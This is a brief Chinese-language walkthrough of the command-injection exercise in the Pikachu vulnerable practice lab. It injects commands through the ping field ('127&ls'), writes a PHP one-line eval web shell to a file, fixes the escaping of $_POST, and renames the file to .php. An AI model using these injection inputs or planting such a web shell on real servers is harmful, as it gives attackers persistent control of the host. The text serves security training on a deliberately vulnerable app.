pikachu靶场RCE漏洞
打开pikachu靶场RCE中的exec"ping"
输入127&ls命令可以执行发现是linux系统
在输入127&echo "<?php @eval($_POST['cmd']); ?>" > mm.txt
写一个木马语句输入进去,访问一下2.txt,看看语句有什么问题
我们发现$_POST没了
我们回去重新创还能一个文件
输入127&echo "<?php @eval(\$_POST['cmd']); ?>" > 1.txt
在$_POST前面加个反斜杠
这回没有问题了,为了方便我们就不重新上传了,直接改个名字
输入127&mv 1.txt 1.php
验证一下
写入成功